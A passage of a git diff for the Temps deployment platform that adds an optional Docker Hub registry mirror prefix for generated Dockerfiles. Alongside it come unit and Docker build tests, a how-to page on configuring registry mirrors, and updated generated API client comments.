 impl BuildImageJobBuilder {
@@ -1363,6 +1439,7 @@ impl BuildImageJobBuilder {
             log_service: None,
             preset: None,
             preset_config: None,
+            registry_mirror_prefix: None,
         }
     }
 
@@ -1431,6 +1508,11 @@ impl BuildImageJobBuilder {
         self
     }
 
+    pub fn registry_mirror_prefix(mut self, registry_mirror_prefix: Option<String>) -> Self {
+        self.registry_mirror_prefix = registry_mirror_prefix;
+        self
+    }
+
     pub fn build(
         self,
         image_builder: Arc<dyn ImageBuilder>,
@@ -1456,6 +1538,7 @@ impl BuildImageJobBuilder {
             job = job.with_preset(preset);
         }
         job = job.with_preset_config(self.preset_config);
+        job = job.with_registry_mirror_prefix(self.registry_mirror_prefix);
 
         Ok(job)
     }
@@ -1984,6 +2067,54 @@ mod tests {
             cross_on_remote_daemon.contains("--install amd64"),
             "the command must name the architecture to install: {}",
             cross_on_remote_daemon
+        );
+    }
+
+    /// A Docker Hub anonymous-pull rate limit must be named explicitly, with
+    /// the registry-mirror fix, instead of surfacing as an opaque pull
+    /// failure that reads like a broken Dockerfile.
+    #[test]
+    fn test_describe_build_failure_names_docker_hub_rate_limit() {
+        let host = "linux/amd64";
+        let rate_limited = BuilderError::BuildFailed(
+            "failed to resolve source metadata for docker.io/library/node:22-slim: \
+             toomanyrequests: You have reached your pull rate limit"
+                .into(),
+        );
+
+        let msg = BuildImageJob::describe_build_failure(Some(host), host, &rate_limited);
+        assert!(msg.contains("Docker Hub rate-limited"), "got: {}", msg);
+        assert!(msg.contains("registry-mirrors"), "got: {}", msg);
+        assert!(msg.contains("daemon.json"), "got: {}", msg);
+        assert!(!msg.contains("binfmt"), "not a QEMU problem: {}", msg);
+
+        // Also recognised with no platform requested (single-arch path).
+        let plain = BuildImageJob::describe_build_failure(None, host, &rate_limited);
+        assert!(plain.contains("Docker Hub rate-limited"), "got: {}", plain);
+
+        // An authorize failure that happens to 429 is the same underlying
+        // problem, just surfaced by BuildKit's resolver instead of the
+        // classic builder.
+        let buildkit_phrasing = BuilderError::BuildFailed(
+            "failed to authorize: failed to fetch anonymous token: unexpected status \
+             from GET request to https://auth.docker.io/token: 429 Too Many Requests"
+                .into(),
+        );
+        let buildkit_msg =
+            BuildImageJob::describe_build_failure(Some(host), host, &buildkit_phrasing);
+        assert!(
+            buildkit_msg.contains("Docker Hub rate-limited"),
+            "got: {}",
+            buildkit_msg
+        );
+
+        // An unrelated failure must not be misdiagnosed as a rate limit.
+        let unrelated = BuilderError::BuildFailed("npm ERR! missing script: build".into());
+        let unrelated_msg = BuildImageJob::describe_build_failure(Some(host), host, &unrelated);
+        assert!(
+            !unrelated_msg.contains("Docker Hub rate-limited"),
+            "got: {}",
+            unrelated_msg
         );
     }
 

--- a/crates/temps-deployments/src/services/workflow_execution_service.rs
+++ b/crates/temps-deployments/src/services/workflow_execution_service.rs
@@ -1188,13 +1188,26 @@ impl WorkflowExecutionService {
 
                 let image_tag = format!("{}:latest", deployment.slug);
 
+                // Route implicit Docker Hub base images through the
+                // operator's configured registry mirror/prefix, if any.
+                // Falls back to unconfigured (no rewriting) rather than
+                // failing the build if settings can't be read -- the
+                // existing anonymous-pull behavior is always a safe default.
+                let registry_mirror_prefix = self
+                    .config_service
+                    .get_settings()
+                    .await
+                    .ok()
+                    .and_then(|settings| settings.registry_mirror_prefix);
+
                 let mut builder = BuildImageJobBuilder::new()
                     .job_id(db_job.job_id.clone())
                     .download_job_id(download_job_id)
                     .image_tag(image_tag)
                     .dockerfile_path(dockerfile_path.to_string())
                     .log_id(db_job.log_id.clone())
-                    .log_service(self.log_service.clone());
+                    .log_service(self.log_service.clone())
+                    .registry_mirror_prefix(registry_mirror_prefix);
 
                 builder = builder
                     .preset(project.preset)

--- a/crates/temps-presets/Cargo.toml
+++ b/crates/temps-presets/Cargo.toml
@@ -11,6 +11,7 @@ repository.workspace = true
 homepage.workspace = true
 
 [dependencies]
+temps-core = { path = "../temps-core" }
 temps-entities = { path = "../temps-entities" }
 serde = { workspace = true }
 serde_json = { workspace = true }

--- a/crates/temps-presets/Cargo.toml
+++ b/crates/temps-presets/Cargo.toml
@@ -38,4 +38,5 @@ openapi = ["utoipa"]
 
 [dev-dependencies]
 tempfile = { workspace = true }
+testcontainers = { workspace = true }
 tokio = { workspace = true, features = ["macros", "rt-multi-thread"] }

--- a/crates/temps-presets/src/lib.rs
+++ b/crates/temps-presets/src/lib.rs
@@ -24,6 +24,7 @@ pub use mod_rs::env_example::{
     detect_env_example_files, detect_env_example_files_in_directory, parse_env_example,
     EnvExampleVariable, ENV_EXAMPLE_FILE_NAMES,
 };
+pub use mod_rs::registry_prefix::apply_registry_prefix;
 pub use {
     all_presets, detect_all_presets_from_files, detect_node_framework,
     detect_node_framework_from_package_json, detect_preset_from_files, get_preset_by_slug,

--- a/crates/temps-presets/src/mod.rs
+++ b/crates/temps-presets/src/mod.rs
@@ -20,6 +20,7 @@ mod nixpacks_preset;
 mod preset_config;
 mod python_preset;
 mod react_app;
+pub mod registry_prefix;
 mod rsbuild;
 mod rust_preset;
 mod vite;

--- a/crates/temps-presets/src/registry_prefix.rs
+++ b/crates/temps-presets/src/registry_prefix.rs
@@ -1,0 +1,172 @@
+// SPDX-FileCopyrightText: 2024-2026 Temps Contributors
+// SPDX-License-Identifier: MIT OR Apache-2.0
+
+//! Rewrites `FROM` lines in a generated Dockerfile through an
+//! operator-configured registry prefix.
+//!
+//! Every preset (including autopack) writes multi-stage Dockerfiles where a
+//! later stage's `FROM` can name either a real image (`FROM node:22-slim`) or
+//! an earlier stage (`FROM autopack-build`). Only the former should ever be
+//! rewritten — renaming a stage reference would break the build outright.
+//! This tracks stage names declared via `AS <name>` as it walks the file and
+//! only rewrites `FROM` references that are neither a known stage nor already
+//! qualified to some other registry (see [`temps_core::registry_prefix`]).
+
+use temps_core::registry_prefix::qualify_with_registry_prefix;
+
+/// Rewrite every `FROM <image>` line in `dockerfile` whose `<image>` is an
+/// implicit Docker Hub reference, prepending `prefix`. `FROM <stage>` lines
+/// referencing an earlier build stage are left untouched, as is any image
+/// already qualified to another registry.
+pub fn apply_registry_prefix(dockerfile: &str, prefix: &str) -> String {
+    let mut stage_names: std::collections::HashSet<String> = std::collections::HashSet::new();
+    let mut out = String::with_capacity(dockerfile.len());
+    let ends_with_newline = dockerfile.ends_with('\n');
+
+    for line in dockerfile.lines() {
+        out.push_str(&rewrite_line(line, prefix, &mut stage_names));
+        out.push('\n');
+    }
+
+    if !ends_with_newline {
+        out.pop();
+    }
+    out
+}
+
+/// Rewrite a single line if it is a `FROM` directive, recording any stage
+/// name it declares along the way.
+fn rewrite_line(
+    line: &str,
+    prefix: &str,
+    stage_names: &mut std::collections::HashSet<String>,
+) -> String {
+    let trimmed = line.trim_start();
+    let Some(rest) = strip_from_prefix(trimmed) else {
+        return line.to_string();
+    };
+    let leading_ws = &line[..line.len() - trimmed.len()];
+
+    let mut parts = rest.split_whitespace();
+    let Some(image) = parts.next() else {
+        return line.to_string();
+    };
+
+    let stage_name = match parts.next() {
+        Some(word) if word.eq_ignore_ascii_case("as") => parts.next(),
+        _ => None,
+    };
+
+    // A build-arg reference (`FROM ${BASE_IMAGE}`) is not a literal image
+    // name -- rewriting it would bake the prefix onto whatever the ARG
+    // expands to at build time, not onto docker.io. No built-in preset emits
+    // this today, but a project's own `.temps.yaml`-influenced Dockerfile
+    // reasonably could.
+    let new_image = if stage_names.contains(image) || image.starts_with('$') {
+        image.to_string()
+    } else {
+        qualify_with_registry_prefix(image, Some(prefix))
+    };
+
+    if let Some(stage) = stage_name {
+        stage_names.insert(stage.to_string());
+        format!("{leading_ws}FROM {new_image} AS {stage}")
+    } else {
+        format!("{leading_ws}FROM {new_image}")
+    }
+}
+
+/// Case-insensitively strip a leading `FROM ` directive keyword, the way
+/// Docker itself parses it (Dockerfile directives are case-insensitive by
+/// spec even though every generator in this codebase emits them uppercase).
+fn strip_from_prefix(trimmed: &str) -> Option<&str> {
+    let bytes = trimmed.as_bytes();
+    if bytes.len() < 5 || !bytes[..4].eq_ignore_ascii_case(b"FROM") {
+        return None;
+    }
+    if !bytes[4].is_ascii_whitespace() {
+        return None;
+    }
+    Some(trimmed[5..].trim_start())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn rewrites_a_single_stage_dockerfile() {
+        let dockerfile = "FROM node:22-slim AS app\nRUN npm install\n";
+        let rewritten = apply_registry_prefix(dockerfile, "registry.example.com/docker");
+        assert_eq!(
+            rewritten,
+            "FROM registry.example.com/docker/node:22-slim AS app\nRUN npm install\n"
+        );
+    }
+
+    #[test]
+    fn leaves_stage_references_untouched_across_a_multi_stage_build() {
+        let dockerfile = "\
+FROM debian:bookworm-slim AS autopack-packages
+RUN apt-get update
+FROM autopack-packages AS autopack-install
+RUN npm ci
+FROM autopack-install AS autopack-build
+RUN npm run build
+FROM debian:bookworm-slim AS final
+COPY --from=autopack-build /app /app
+";
+        let rewritten = apply_registry_prefix(dockerfile, "registry.example.com/docker");
+
+        assert!(rewritten.contains(
+            "FROM registry.example.com/docker/debian:bookworm-slim AS autopack-packages"
+        ));
+        // Stage references must survive verbatim -- rewriting these would
+        // point the build at an image that was never built.
+        assert!(rewritten.contains("FROM autopack-packages AS autopack-install"));
+        assert!(rewritten.contains("FROM autopack-install AS autopack-build"));
+        // A later stage reusing the same base image is rewritten independently.
+        assert!(rewritten.contains("FROM registry.example.com/docker/debian:bookworm-slim AS final"));
+    }
+
+    #[test]
+    fn does_not_rewrite_images_already_qualified_to_another_registry() {
+        let dockerfile = "FROM ghcr.io/gotempsh/temps-base:latest AS app\n";
+        let rewritten = apply_registry_prefix(dockerfile, "registry.example.com/docker");
+        assert_eq!(rewritten, dockerfile);
+    }
+
+    #[test]
+    fn preserves_leading_indentation_and_bare_from_without_a_stage_name() {
+        let dockerfile = "  FROM node:22-slim\n";
+        let rewritten = apply_registry_prefix(dockerfile, "registry.example.com/docker");
+        assert_eq!(
+            rewritten,
+            "  FROM registry.example.com/docker/node:22-slim\n"
+        );
+    }
+
+    #[test]
+    fn preserves_a_missing_trailing_newline() {
+        let dockerfile = "FROM node:22-slim AS app";
+        let rewritten = apply_registry_prefix(dockerfile, "registry.example.com/docker");
+        assert_eq!(
+            rewritten,
+            "FROM registry.example.com/docker/node:22-slim AS app"
+        );
+    }
+
+    #[test]
+    fn does_not_rewrite_a_build_arg_base_image() {
+        let dockerfile = "ARG BASE_IMAGE=node:22-slim\nFROM ${BASE_IMAGE} AS app\n";
+        let rewritten = apply_registry_prefix(dockerfile, "registry.example.com/docker");
+        assert_eq!(rewritten, dockerfile);
+    }
+
+    #[test]
+    fn ignores_non_from_lines_entirely() {
+        let dockerfile = "# a comment mentioning FROM inside text\nRUN echo hi\n";
+        let rewritten = apply_registry_prefix(dockerfile, "registry.example.com/docker");
+        assert_eq!(rewritten, dockerfile);
+    }
+}

--- a/crates/temps-presets/tests/registry_prefix_docker_build.rs
+++ b/crates/temps-presets/tests/registry_prefix_docker_build.rs
@@ -1,0 +1,138 @@
+// SPDX-FileCopyrightText: 2024-2026 Temps Contributors
+// SPDX-License-Identifier: MIT OR Apache-2.0
+
+//! Proves the registry-mirror-prefix rewrite is not just a text transform:
+//! the rewritten `FROM` line has to survive real BuildKit parsing and the
+//! image actually has to resolve and pull through the configured prefix.
+//!
+//! Everything else touching this feature is a unit test against a string
+//! (`temps-core::registry_prefix`, `temps-presets::registry_prefix`). This is
+//! the one place that runs `docker build` against the rewritten output, the
+//! same way `tests/starters.rs` runs a real build for the unprefixed case.
+
+use std::io::Write;
+use std::path::Path;
+use std::process::{Command, Stdio};
+
+use temps_presets::{apply_registry_prefix, AutopackPreset, DockerfileConfig, Preset};
+
+/// `mirror.gcr.io` is a public, unauthenticated pull-through cache for
+/// Docker Hub -- exactly the kind of target this doc/feature exists to
+/// support, and reachable without any operator-specific credentials, so this
+/// test can run anywhere `docker` can reach the network.
+const PUBLIC_MIRROR: &str = "mirror.gcr.io";
+
+fn docker_available() -> bool {
+    Command::new("docker")
+        .args(["info"])
+        .stdout(Stdio::null())
+        .stderr(Stdio::null())
+        .status()
+        .is_ok_and(|status| status.success())
+}
+
+fn write_node_fixture(dir: &Path) {
+    std::fs::write(
+        dir.join("package.json"),
+        r#"{"scripts":{"start":"node server.js"}}"#,
+    )
+    .expect("write package.json");
+    std::fs::write(
+        dir.join("server.js"),
+        "require('http').createServer((_, res) => res.end('ok')).listen(process.env.PORT || 3000);\n",
+    )
+    .expect("write server.js");
+}
+
+fn render_dockerfile(dir: &Path) -> String {
+    let mut config = DockerfileConfig::new(dir, dir, "registry-prefix-e2e");
+    config.use_buildkit = true;
+    let runtime = tokio::runtime::Builder::new_current_thread()
+        .enable_all()
+        .build()
+        .expect("a tokio runtime");
+    runtime
+        .block_on(AutopackPreset::new().dockerfile(config))
+        .content
+}
+
+/// Feed `dockerfile` to `docker build` via stdin (never touches the fixture
+/// tree) and return the captured output. Mirrors `tests/starters.rs::verify`.
+fn docker_build(context_dir: &Path, tag: &str, dockerfile: &str) -> Result<(), String> {
+    let mut build = Command::new("docker");
+    build
+        .args(["build", "--progress", "plain", "-t", tag, "-f", "-", "."])
+        .current_dir(context_dir)
+        .env("DOCKER_BUILDKIT", "1")
+        .stdin(Stdio::piped())
+        .stdout(Stdio::piped())
+        .stderr(Stdio::piped());
+
+    let mut child = build
+        .spawn()
+        .map_err(|e| format!("could not start docker build: {e}"))?;
+    child
+        .stdin
+        .as_mut()
+        .expect("stdin")
+        .write_all(dockerfile.as_bytes())
+        .map_err(|e| format!("could not write the Dockerfile: {e}"))?;
+    let output = child
+        .wait_with_output()
+        .map_err(|e| format!("docker build failed to complete: {e}"))?;
+
+    if !output.status.success() {
+        let log = String::from_utf8_lossy(&output.stderr);
+        let tail: Vec<&str> = log.lines().rev().take(40).collect();
+        return Err(format!(
+            "docker build failed\n--- build log (last 40 lines) ---\n{}\n--- Dockerfile ---\n{dockerfile}",
+            tail.into_iter().rev().collect::<Vec<_>>().join("\n")
+        ));
+    }
+    Ok(())
+}
+
+#[test]
+fn a_registry_mirror_prefixed_dockerfile_actually_builds() {
+    if !docker_available() {
+        println!("Docker not available, skipping");
+        return;
+    }
+
+    let fixture = tempfile::tempdir().expect("a temp dir");
+    write_node_fixture(fixture.path());
+
+    let dockerfile = render_dockerfile(fixture.path());
+    assert!(
+        !dockerfile.contains("autopack could not plan"),
+        "the preset produced no build plan:\n{dockerfile}"
+    );
+
+    let rewritten = apply_registry_prefix(&dockerfile, PUBLIC_MIRROR);
+
+    // Sanity-check the rewrite actually happened before spending a real
+    // `docker build` proving it works -- a no-op rewrite would make the rest
+    // of this test meaningless (it would just be re-running starters.rs).
+    assert!(
+        rewritten.contains(&format!("FROM {PUBLIC_MIRROR}/")),
+        "expected at least one FROM line rewritten through {PUBLIC_MIRROR}, got:\n{rewritten}"
+    );
+    assert_ne!(
+        dockerfile, rewritten,
+        "prefix rewrite must change the Dockerfile"
+    );
+
+    let tag = "temps-registry-prefix-e2e:test";
+    let result = docker_build(fixture.path(), tag, &rewritten);
+
+    // Best-effort cleanup regardless of outcome.
+    let _ = Command::new("docker")
+        .args(["rmi", "-f", tag])
+        .stdout(Stdio::null())
+        .stderr(Stdio::null())
+        .status();
+
+    if let Err(e) = result {
+        panic!("building the registry-mirror-prefixed Dockerfile failed: {e}");
+    }
+}

--- a/crates/temps-presets/tests/registry_prefix_docker_build.rs
+++ b/crates/temps-presets/tests/registry_prefix_docker_build.rs
@@ -10,11 +10,16 @@
 //! the one place that runs `docker build` against the rewritten output, the
 //! same way `tests/starters.rs` runs a real build for the unprefixed case.
 
+use std::collections::HashSet;
 use std::io::Write;
+use std::net::TcpStream;
 use std::path::Path;
 use std::process::{Command, Stdio};
+use std::time::Duration;
 
 use temps_presets::{apply_registry_prefix, AutopackPreset, DockerfileConfig, Preset};
+use testcontainers::runners::AsyncRunner;
+use testcontainers::GenericImage;
 
 /// `mirror.gcr.io` is a public, unauthenticated pull-through cache for
 /// Docker Hub -- exactly the kind of target this doc/feature exists to
@@ -134,5 +139,134 @@ fn a_registry_mirror_prefixed_dockerfile_actually_builds() {
 
     if let Err(e) = result {
         panic!("building the registry-mirror-prefixed Dockerfile failed: {e}");
+    }
+}
+
+/// Extracts the docker-hub image references a `FROM {prefix}/...` rewrite
+/// produced, so the test can seed exactly those images into the local
+/// registry before building -- rather than guessing what autopack chose.
+fn images_rewritten_through(rewritten: &str, prefix: &str) -> HashSet<String> {
+    let needle = format!("FROM {prefix}/");
+    rewritten
+        .lines()
+        .filter_map(|line| {
+            let rest = line.trim_start().strip_prefix(&needle)?;
+            // A stage reference is "<image> AS <name>" -- keep only the image.
+            rest.split_whitespace().next().map(str::to_string)
+        })
+        .collect()
+}
+
+fn wait_for_tcp(port: u16, timeout: Duration) -> bool {
+    let deadline = std::time::Instant::now() + timeout;
+    while std::time::Instant::now() < deadline {
+        if TcpStream::connect(("127.0.0.1", port)).is_ok() {
+            return true;
+        }
+        std::thread::sleep(Duration::from_millis(200));
+    }
+    false
+}
+
+fn docker(args: &[&str]) -> Result<(), String> {
+    let output = Command::new("docker")
+        .args(args)
+        .output()
+        .map_err(|e| format!("could not run docker {args:?}: {e}"))?;
+    if !output.status.success() {
+        return Err(format!(
+            "docker {args:?} failed: {}",
+            String::from_utf8_lossy(&output.stderr)
+        ));
+    }
+    Ok(())
+}
+
+/// Same proof as above, but against a real *self-hosted* registry rather
+/// than a public mirror -- this is the scenario the feature actually exists
+/// for (an operator's own path-prefixing registry proxy, not Docker's own
+/// pull-through cache infrastructure), and it runs fully offline once the
+/// base image is cached, with no dependency on a third-party host being up.
+#[test]
+fn a_registry_mirror_prefixed_dockerfile_builds_against_a_self_hosted_registry() {
+    if !docker_available() {
+        println!("Docker not available, skipping");
+        return;
+    }
+
+    let runtime = tokio::runtime::Builder::new_current_thread()
+        .enable_all()
+        .build()
+        .expect("a tokio runtime");
+
+    let port = match runtime.block_on(async {
+        let container = GenericImage::new("registry", "2").start().await?;
+        let port = container.get_host_port_ipv4(5000).await?;
+        // `ContainerAsync::drop` schedules async cleanup on the current Tokio
+        // reactor; by the time this function returns, the `current_thread`
+        // runtime above is no longer entered, so a normal drop panics with
+        // "no reactor running". Leak it instead -- the test process exits
+        // right after, same workaround already used by
+        // `temps-providers/tests/role_reconciler_integration.rs`.
+        Box::leak(Box::new(container));
+        Ok::<_, testcontainers::TestcontainersError>(port)
+    }) {
+        Ok(port) => port,
+        Err(e) => {
+            println!("could not start a local registry container, skipping: {e}");
+            return;
+        }
+    };
+
+    if !wait_for_tcp(port, Duration::from_secs(15)) {
+        println!("local registry never accepted connections, skipping");
+        return;
+    }
+    let prefix = format!("localhost:{port}");
+
+    let fixture = tempfile::tempdir().expect("a temp dir");
+    write_node_fixture(fixture.path());
+    let dockerfile = render_dockerfile(fixture.path());
+    assert!(
+        !dockerfile.contains("autopack could not plan"),
+        "the preset produced no build plan:\n{dockerfile}"
+    );
+
+    let rewritten = apply_registry_prefix(&dockerfile, &prefix);
+    assert_ne!(
+        dockerfile, rewritten,
+        "prefix rewrite must change the Dockerfile"
+    );
+
+    let images = images_rewritten_through(&rewritten, &prefix);
+    assert!(
+        !images.is_empty(),
+        "expected at least one FROM line rewritten through {prefix}, got:\n{rewritten}"
+    );
+
+    // Seed the local registry with exactly the images the rewrite expects to
+    // find there -- mirroring what an operator's own registry proxy would
+    // already have cached/proxied.
+    for image in &images {
+        if let Err(e) = docker(&["pull", image]) {
+            println!("could not pull {image} to seed the local registry, skipping: {e}");
+            return;
+        }
+        let local_ref = format!("{prefix}/{image}");
+        docker(&["tag", image, &local_ref]).expect("tag for local registry push");
+        docker(&["push", &local_ref]).expect("push to local registry");
+    }
+
+    let tag = "temps-registry-prefix-e2e-self-hosted:test";
+    let result = docker_build(fixture.path(), tag, &rewritten);
+
+    let _ = Command::new("docker")
+        .args(["rmi", "-f", tag])
+        .stdout(Stdio::null())
+        .stderr(Stdio::null())
+        .status();
+
+    if let Err(e) = result {
+        panic!("building against the self-hosted registry mirror failed: {e}");
     }
 }

--- a/docs/howto/configure-a-docker-registry-mirror/page.mdx
+++ b/docs/howto/configure-a-docker-registry-mirror/page.mdx
@@ -1,0 +1,97 @@
+export const metadata = {
+  title: 'Configure a Docker Registry Mirror',
+  description:
+    'Stop builds from failing with Docker Hub anonymous pull rate limits by configuring a registry mirror on the Docker daemon.',
+  alternates: {
+    canonical: '/docs/configure-a-docker-registry-mirror',
+  },
+}
+
+export const sections = [
+  { title: 'Why this happens', id: 'why-this-happens' },
+  { title: 'Configure a registry mirror', id: 'configure-a-registry-mirror' },
+  { title: 'Also get the authenticated pull ceiling', id: 'also-get-the-authenticated-pull-ceiling' },
+  { title: 'Multi-node clusters', id: 'multi-node-clusters' },
+  { title: 'Verify it worked', id: 'verify-it-worked' },
+]
+
+# Configure a Docker Registry Mirror
+
+Every build Temps runs — including autopack — pulls its base images (`node:22-slim`, `debian:bookworm-slim`, and similar) straight from Docker Hub through the local Docker daemon. Temps does not add registry authentication or rewrite those references, so the daemon's own configuration decides how those pulls resolve. {{ className: 'lead' }}
+
+---
+
+## Why this happens {{ anchor: true, id: 'why-this-happens' }}
+
+Docker Hub throttles anonymous (unauthenticated) image pulls by source IP. That limit is shared across every build a host runs — and, on a multi-node cluster, across every node sitting behind the same WAN IP. Once you cross it, builds start failing with an error like:
+
+```
+toomanyrequests: You have reached your pull rate limit
+```
+
+or, on BuildKit:
+
+```
+failed to authorize: failed to fetch anonymous token: ...: 429 Too Many Requests
+```
+
+Temps surfaces this in the deployment log as "Docker Hub rate-limited an anonymous image pull" so it is not mistaken for a broken Dockerfile — but fixing it happens at the Docker Engine level, not in Temps.
+
+---
+
+## Configure a registry mirror {{ anchor: true, id: 'configure-a-registry-mirror' }}
+
+Because autopack always emits unqualified image references (no registry prefix), Docker's built-in `registry-mirrors` daemon option is enough — it transparently redirects any pull that would otherwise go to `docker.io`, with no changes needed to Temps or to any Dockerfile.
+
+1. Edit (or create) `/etc/docker/daemon.json` on the build host:
+
+   ```json
+   {
+     "registry-mirrors": ["https://mirror.gcr.io"]
+   }
+   ```
+
+   `mirror.gcr.io` is a public, read-only cache for Docker Hub images and works well as a first step. For a self-hosted cache, see the next section.
+
+2. Restart Docker:
+
+   ```bash
+   sudo systemctl restart docker
+   ```
+
+3. Re-run the failing deployment.
+
+If the mirror is unreachable, the daemon falls back to pulling from `docker.io` directly — configuring this is safe to leave on permanently.
+
+---
+
+## Also get the authenticated pull ceiling {{ anchor: true, id: 'also-get-the-authenticated-pull-ceiling' }}
+
+`registry-mirrors` alone only caches — it does not authenticate to Docker Hub, so it doesn't raise the underlying rate limit. To get both caching and a higher, authenticated pull ceiling, run your own pull-through cache and give it real Docker Hub credentials:
+
+```bash
+docker run -d --name registry-mirror \
+  -p 5000:5000 \
+  -e REGISTRY_PROXY_REMOTEURL=https://registry-1.docker.io \
+  -e REGISTRY_PROXY_USERNAME=<your-docker-hub-username> \
+  -e REGISTRY_PROXY_PASSWORD=<your-docker-hub-token> \
+  registry:2
+```
+
+Then point `registry-mirrors` in `daemon.json` at `http://<mirror-host>:5000` instead of a public mirror.
+
+---
+
+## Multi-node clusters {{ anchor: true, id: 'multi-node-clusters' }}
+
+If several worker nodes build behind the same WAN IP (for example several Kubernetes clusters or a Temps multi-node deployment egressing through one NAT gateway), the rate limit is shared across all of them even though each node's Docker daemon is independent. Point every node's `registry-mirrors` at the same shared cache so the pulls are deduplicated instead of each node hitting Docker Hub separately.
+
+---
+
+## Verify it worked {{ anchor: true, id: 'verify-it-worked' }}
+
+```bash
+docker info | grep -A2 "Registry Mirrors"
+```
+
+Should list the mirror URL you configured. A subsequent `docker pull node:22-slim` on an image not already cached locally will go through the mirror rather than `docker.io` directly.

--- a/docs/howto/configure-a-docker-registry-mirror/page.mdx
+++ b/docs/howto/configure-a-docker-registry-mirror/page.mdx
@@ -1,3 +1,8 @@
+{/*
+SPDX-FileCopyrightText: 2024-2026 Temps Contributors
+SPDX-License-Identifier: MIT OR Apache-2.0
+*/}
+
 export const metadata = {
   title: 'Configure a Docker Registry Mirror',
   description:

--- a/web/src/api/client/@tanstack/react-query.gen.ts
+++ b/web/src/api/client/@tanstack/react-query.gen.ts
@@ -9796,9 +9796,9 @@ export const getVisibleCustomDomainByHostnameOptions = (options: Options<GetVisi
 /**
  * Create a new project from a template
  *
- * Creates a new repository from a template and sets up the project with the
- * specified configuration. The template is cloned to a new repository under
- * the authenticated user's account or specified organization.
+ * Image-backed service templates are created directly from their pinned image.
+ * Source-backed starter templates can either use their public repository or
+ * create a repository under the selected Git provider account.
  */
 export const createProjectFromTemplateMutation = (options?: Partial<Options<CreateProjectFromTemplateData>>): UseMutationOptions<CreateProjectFromTemplateResponse2, DefaultError, Options<CreateProjectFromTemplateData>> => {
     const mutationOptions: UseMutationOptions<CreateProjectFromTemplateResponse2, DefaultError, Options<CreateProjectFromTemplateData>> = {
@@ -14178,9 +14178,8 @@ export const updateServiceTemplateRuntimeMutation = (options?: Partial<Options<U
 export const getProjectServiceTemplateQueryKey = (options: Options<GetProjectServiceTemplateData>) => createQueryKey('getProjectServiceTemplate', options);
 
 /**
- * Atomically replace a service-template project's image runtime and resource
- * profile. This endpoint is deliberately separate from generic project
- * settings because these fields form one deployable configuration.
+ * Return the immutable service-template release applied to a project together
+ * with catalog drift, missing requirements, and an available upgrade preview.
  */
 export const getProjectServiceTemplateOptions = (options: Options<GetProjectServiceTemplateData>) => queryOptions<GetProjectServiceTemplateResponse, DefaultError, GetProjectServiceTemplateResponse, ReturnType<typeof getProjectServiceTemplateQueryKey>>({
     queryFn: async ({ queryKey, signal }) => {

--- a/web/src/api/client/sdk.gen.ts
+++ b/web/src/api/client/sdk.gen.ts
@@ -4915,9 +4915,9 @@ export const getVisibleCustomDomainByHostname = <ThrowOnError extends boolean = 
 /**
  * Create a new project from a template
  *
- * Creates a new repository from a template and sets up the project with the
- * specified configuration. The template is cloned to a new repository under
- * the authenticated user's account or specified organization.
+ * Image-backed service templates are created directly from their pinned image.
+ * Source-backed starter templates can either use their public repository or
+ * create a repository under the selected Git provider account.
  */
 export const createProjectFromTemplate = <ThrowOnError extends boolean = false>(options: Options<CreateProjectFromTemplateData, ThrowOnError>): RequestResult<CreateProjectFromTemplateResponses, CreateProjectFromTemplateErrors, ThrowOnError> => (options.client ?? client).post<CreateProjectFromTemplateResponses, CreateProjectFromTemplateErrors, ThrowOnError>({
     security: [{ scheme: 'bearer', type: 'http' }],
@@ -7080,9 +7080,8 @@ export const updateServiceTemplateRuntime = <ThrowOnError extends boolean = fals
 });
 
 /**
- * Atomically replace a service-template project's image runtime and resource
- * profile. This endpoint is deliberately separate from generic project
- * settings because these fields form one deployable configuration.
+ * Return the immutable service-template release applied to a project together
+ * with catalog drift, missing requirements, and an available upgrade preview.
  */
 export const getProjectServiceTemplate = <ThrowOnError extends boolean = false>(options: Options<GetProjectServiceTemplateData, ThrowOnError>): RequestResult<GetProjectServiceTemplateResponses, GetProjectServiceTemplateErrors, ThrowOnError> => (options.client ?? client).get<GetProjectServiceTemplateResponses, GetProjectServiceTemplateErrors, ThrowOnError>({
     security: [{ scheme: 'bearer', type: 'http' }],

--- a/web/src/api/client/types.gen.ts
+++ b/web/src/api/client/types.gen.ts
@@ -1512,6 +1512,19 @@ export type AppSettings = {
     preview_gateway?: PreviewGatewaySettings;
     rate_limiting?: RateLimitSettings;
     /**
+     * Prefix applied to Docker Hub base images generated for a build (e.g.
+     * autopack's `FROM node:22-slim`), turning them into
+     * `{prefix}/node:22-slim`. Unlike `docker_registry` above — which
+     * authenticates pulls to one *named* private registry a user's own image
+     * reference already points at — this rewrites Temps' own generated,
+     * otherwise-anonymous `docker.io` references, for operators whose
+     * internal registry is a path-prefixing reverse proxy rather than a
+     * `registry-mirrors`-compatible pull-through cache (which needs no
+     * rewriting at all — see docs/howto/configure-a-docker-registry-mirror).
+     * `None`/empty (the default) leaves every reference untouched.
+     */
+    registry_mirror_prefix?: string | null;
+    /**
      * Upstream request/connection timeouts applied by the proxy to customer
      * app traffic. Provides a global hard ceiling plus global defaults for
      * regular HTTP, SSE, and WebSocket traffic; projects and environments
@@ -1647,6 +1660,12 @@ export type AppSettingsResponse = {
      */
     proxy_port: number;
     rate_limiting: RateLimitSettings;
+    /**
+     * Prefix applied to implicit Docker Hub base images in generated
+     * Dockerfiles (e.g. autopack's `FROM node:22-slim`). No sensitive
+     * content, passed through as-is. `None`/empty disables rewriting.
+     */
+    registry_mirror_prefix?: string | null;
     /**
      * Upstream request/connection timeouts (hard ceiling + defaults) applied
      * by the proxy to customer app traffic. No sensitive content.

--- a/web/src/api/client/types.gen.ts
+++ b/web/src/api/client/types.gen.ts
@@ -4405,7 +4405,10 @@ export type CreateProjectAccessRequest = {
 /**
  * Request to create a project from a template
  *
- * Supports two deploy modes:
+ * Supports three deploy modes:
+ * * **Native image service mode** — curated service templates deploy a
+ * digest-pinned container image and retain their template release identity,
+ * runtime configuration, and managed-service bindings.
  * * **Fork mode** — when `git_provider_connection_id` is set, the template
  * repo is cloned into a new repository under the user's Git account and the
  * project tracks that fork (git-push deploys, automatic deploy on push).
@@ -4498,11 +4501,13 @@ export type CreateProjectFromTemplateRequest = {
  */
 export type CreateProjectFromTemplateResponse = {
     /**
-     * Actionable retry guidance when project creation succeeded but deployment dispatch did not. Internal queue errors are never exposed.
+     * Actionable retry guidance when project creation succeeded but deployment
+     * dispatch did not. Internal queue errors are never exposed.
      */
     deployment_error?: string | null;
     /**
-     * Whether the initial deployment was successfully queued. This is set for native image service templates; Git-backed modes use their pipeline flow.
